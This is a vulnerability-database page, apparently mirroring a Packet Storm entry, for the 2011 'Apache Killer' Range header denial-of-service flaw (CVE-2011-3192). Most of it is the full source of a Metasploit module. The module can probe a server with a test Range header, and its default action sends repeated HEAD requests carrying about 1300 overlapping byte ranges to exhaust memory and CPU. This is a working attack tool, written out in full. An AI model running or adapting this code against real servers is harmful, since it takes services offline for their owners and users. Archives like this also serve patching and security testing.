Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Apache Range Header Denial of Service (Apache Killer)

🗓️ 31 Aug 2024 00:00:00Reported by Kingcope, Masashi Fujiwara, Markus Neis, metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 658 Views

Apache Range Header DoS - "Apache Killer" allows remote attackers to cause a denial of service via a Range header expressing multiple overlapping ranges.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Apache HTTP Server Denial of Service
9 Dec 201100:00
zdt
0day.today		Obehotel CMS SQL Injection Vulnerability
27 Aug 201300:00
zdt
0day.today		Opolis.eu Secure Mail Blind SQL Injection / XSS / CSRF / DoS
8 Oct 201300:00
zdt
IBM Security Bulletins		Security Bulletin: Potential security exposure with IBM HTTP Server 8.0 and earlier (PM46234) (CVE-2011-3192)
8 Sep 202200:26
ibm
IBM Security Bulletins		Security Bulletin: API Connect is affected by an Apache HTTP Server vulnerability (CVE-2011-3192)
15 Jun 201807:07
ibm
Gitee		Exploit for CVE-2007-6750
27 Jul 202503:38
gitee
GithubExploit		Exploit for Improper Certificate Validation in Apache Http_Server
29 Dec 202510:08
githubexploit
GithubExploit		Exploit for Uncontrolled Resource Consumption in Apache Http_Server
26 Oct 201121:07
githubexploit
ALT Linux		Security fix for the ALT Linux 8 package apache2 version 2.2.20-alt1
31 Aug 201100:00
altlinux
ALT Linux		Security fix for the ALT Linux 9 package apache2 version 2.2.20-alt1
31 Aug 201100:00
altlinux
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Apache Range Header DoS (Apache Killer)',  
'Description' => %q{  
The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x  
through 2.2.19 allows remote attackers to cause a denial of service (memory and  
CPU consumption) via a Range header that expresses multiple overlapping ranges,  
exploit called "Apache Killer"  
},  
'Author' =>  
[  
'Kingcope', #original discoverer  
'Masashi Fujiwara', #metasploit module  
'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability  
],  
'License' => MSF_LICENSE,  
'Actions' =>  
[  
['DOS', 'Description' => 'Trigger Denial of Service against target'],  
['CHECK', 'Description' => 'Check if target is vulnerable']  
],  
'DefaultAction' => 'DOS',  
'References' =>  
[  
[ 'BID', '49303'],  
[ 'CVE', '2011-3192'],  
[ 'EDB', '17696'],  
[ 'OSVDB', '74721' ],  
],  
'DisclosureDate' => '2011-08-19'  
))  
  
register_options(  
[  
Opt::RPORT(80),  
OptString.new('URI', [ true, "The request URI", '/']),  
OptInt.new('RLIMIT', [ true, "Number of requests to send",50])  
])  
end  
  
def run_host(ip)  
  
case action.name  
when 'DOS'  
conduct_dos()  
  
when 'CHECK'  
check_for_dos()  
end  
  
end  
  
def check_for_dos()  
uri = datastore['URI']  
rhost = datastore['RHOST']  
begin  
res = send_request_cgi({  
'uri' => uri,  
'method' => 'HEAD',  
'headers' => {  
"HOST" => rhost,  
"Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10",  
"Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"  
}  
})  
  
if (res and res.code == 206)  
print_status("Response was #{res.code}")  
print_status("Found Byte-Range Header DOS at #{uri}")  
  
report_note(  
:host => rhost,  
:port => rport,  
:type => 'apache.killer',  
:data => "Apache Byte-Range DOS at #{uri}"  
)  
  
else  
print_status("#{rhost} doesn't seem to be vulnerable at #{uri}")  
end  
  
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout  
rescue ::Timeout::Error, ::Errno::EPIPE  
end  
end  
  
  
def conduct_dos()  
uri = datastore['URI']  
rhost = datastore['RHOST']  
ranges = ''  
for i in (0..1299) do  
ranges += ",5-" + i.to_s  
end  
for x in 1..datastore['RLIMIT']  
begin  
print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")  
res = send_request_cgi({  
'uri' => uri,  
'method' => 'HEAD',  
'headers' => {  
"HOST" => rhost,  
"Range" => "bytes=0-#{ranges}",  
"Request-Range" => "bytes=0-#{ranges}"}},1)  
  
rescue ::Rex::ConnectionRefused  
print_error("Unable to connect to #{rhost}:#{rport}")  
rescue ::Errno::ECONNRESET  
print_good("DoS packet successful. #{rhost} not responding.")  
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout  
print_error("Couldn't connect to #{rhost}:#{rport}")  
rescue ::Timeout::Error, ::Errno::EPIPE  
end  
end  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Aug 2024 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.8
EPSS0.90456
apache range headerdenial of serviceremote attackersmultiple overlapping rangesapache killermemory consumptioncpu consumption
658